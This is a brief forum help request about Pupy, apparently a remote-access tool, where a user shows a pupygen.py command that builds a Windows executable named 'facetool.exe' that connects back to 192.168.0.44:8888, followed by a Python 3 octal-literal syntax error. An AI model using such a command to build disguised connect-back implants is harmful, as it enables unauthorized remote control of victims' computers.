PDA

View Full Version : Issue on using Pupy



Imprevisible
2021-04-14, 09:00
Hi, I want to use Pupy, but when i do this command :


python3 ./pupygen.py -f exe_x64 -o facetool.exe connect -host 192.168.0.44:8888

I have this issue :


File "./pupygen.py", line 221
os.chmod(os.path.join(root, dir), 0700)
^
SyntaxError: leading zeros in decimal integer literals are not permitted; use an 0o prefix for octal integers